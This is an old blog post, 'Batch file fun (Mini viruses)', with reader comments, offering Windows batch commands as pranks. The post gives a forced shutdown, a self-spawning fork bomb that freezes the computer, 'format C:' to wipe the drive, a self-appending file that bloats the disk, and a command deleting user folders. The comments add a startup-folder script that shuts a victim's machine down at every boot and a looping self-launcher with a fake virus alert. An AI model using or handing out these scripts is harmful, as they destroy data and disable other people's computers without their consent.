Batch file fun ( Mini viruses )

by R MAK on June 9, 2008 · 7 comments

in Softwares

 

Here are alot of batch files and short cuts that are short and easy to use
what Batch files dos is that they are just commands that do awesome things

to use:
For the short ones use a short cut and change the icon and for the long one use the batch file (save in notepad and save as *.bat) but it really doesn’t matter for the short ones to be saved in bat files.

ok lets start with simple ones
to shutdown
Code:
shutdown -s -t 05 -c "type your message here"

to change the time out change the number to what ever number you like but if you want to shut it down as soon as you open it take the -t out and the number


to restart
its similar to the shutdown
Code:
shutdown -r -t 05 -c "type your message here"
[ad#ad-2]
heres another simple one that packs one almighty punch and freezes the computer
Code:

start name.bat
name.bat

then save it as the name.bat
when clicked it will freeze the comuter

this one wipes out your C: when unprotected
Code:
format C:

this one will get [b]really[b] big and slow your com a lot
Code:

name.bat>>name.bat
name.bat

i can’t be stuffed writing any thing any more so ill be brief

deletes my docs
Code:
rmdir C:\Documents and Settings \S\Q

Search Here

 

 

You might also like

Rough Guides: DIRECTIONS travel guide collection
DIRECTIONS Guides are the new compact series from Rough Guides, offering an original travel guide alternative...
How to find password for a .zip or .rar file
Here is a little tip, that seems absurd but it might do great help when you need it. If you regularly...
How to Create iPhone ringtones from iTunes previews
With the advent of being able to easily hack ringtones onto your iPhone, there's just one thing missing:...
Antivirus for USB – All in One
While surfing  internet I came acros this great All in one Antivirus pack that is portable and...

Pages: 1 2 3 4 5 6...

Pages: 1 2 3 4 5 6

{ 1 trackback }

bat
06.11.08 at 9:05 am

{ 6 comments… read them below or add one }

1 DogEatDog 07.19.08 at 10:40 pm

is there anyway to make the shutdown one recurring like every time the computer starts?

2 R MAK 07.19.08 at 10:58 pm

For Technology advice , you should visit our new technology blog

http://www.ixibo.com/

3 ChatGhosty 10.02.08 at 7:49 am

July 19, 2008
is there anyway to make the shutdown one recurring like every time the computer starts?

Yes. There is a way. Its an easy way. Make a BAT file called (Anything)and put this code in it.

@ECHO OFF
shutdown -s -t 05 -c “This shutsdown your computer”
PAUSE
CLS
EXIT

Save that in the startup files. and about 1-5 mins there computer will shutdown. Have Fun.
ChatGhosty

Ps. Dont get in truble.

4 immu 12.06.08 at 1:11 am

sent me mini virus and .bat files how to create

5 Krishna 05.25.09 at 4:01 am

this is realy nice code so send me code to how to make small virus

6 USAFDavies 10.27.09 at 8:10 pm

@ immu. to make a batch file open up notepad. and type something like:

@echo off
shutdown -s -t 10 -c
pause
:loop
start “(whatever this filename is) .bat”
echo “Virus Detected: Terminating Windows”
goto loop
exit

then save your file as whatever you want (make sure its the same as what you put in the code) change the file format to “all file types” and put “.bat” at the end of it. once saved…you’ve made a batch file.

Leave a Comment

You can use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

CommentLuv Enabled

Previous post:

Next post: